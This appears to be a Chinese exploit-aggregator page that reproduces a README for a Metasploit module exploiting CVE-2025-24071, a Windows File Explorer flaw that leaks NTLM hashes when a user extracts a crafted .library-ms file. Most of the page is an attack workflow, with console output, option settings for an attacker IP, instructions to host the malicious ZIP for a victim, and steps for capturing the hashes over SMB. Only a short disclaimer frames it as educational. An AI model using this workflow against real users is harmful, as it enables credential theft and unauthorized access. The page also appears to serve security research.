关联漏洞
标题:
Microsoft Windows File Explorer 信息泄露漏洞
(CVE-2025-24071)
描述:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server
描述
CVE-2025-24071
介绍
# Blackash-CVE-2025-24071
# CVE-2025-24071: NTLM Hash Leak via .library-ms File, Metasploit Module 🚨
# Description
Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.
# Metrics
CNA: `Microsoft` Corporation Base Score: 6.5 MEDIUM 🟠 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
# Overview
The vulnerability occurs when a user extracts a ZIP archive containing a specially crafted .`library-ms` file. Windows Explorer automatically initiates an SMB authentication request to a remote server specified in the file, leaking the user's NTLM hash without any user interaction.
This Metasploit module:
1. Generates a malicious .`library-ms` file.
2. Packs it into a ZIP archive.
3. Integrates with Metasploit's SMB capture functionality to collect NTLM hashes.
```
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v6.4.64-dev ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
```
# Installation:
1. Clone the repository:
```
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071
```
# Usage:
1. Load the module:
```
use auxiliary/server/ntlm_hash_leak
```
2. Set the required options:
```
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
```
3. Run the module :
```
run
```
4. The module will generate a malicious ZIP file (exploit.zip). Host this file for the victim to download and extract.
5. Use Metasploit's SMB capture module to collect NTLM hashes:
```
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run
```
# Disclaimer ⚠️
For educational and research purposes only. Use only against systems you own or have permission to test.
文件快照
[4.0K] /data/pocs/d51277af871225be26aa4542767bb2e42512b3c9
├── [2.9K] CVE-2025-24071.rb
└── [3.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。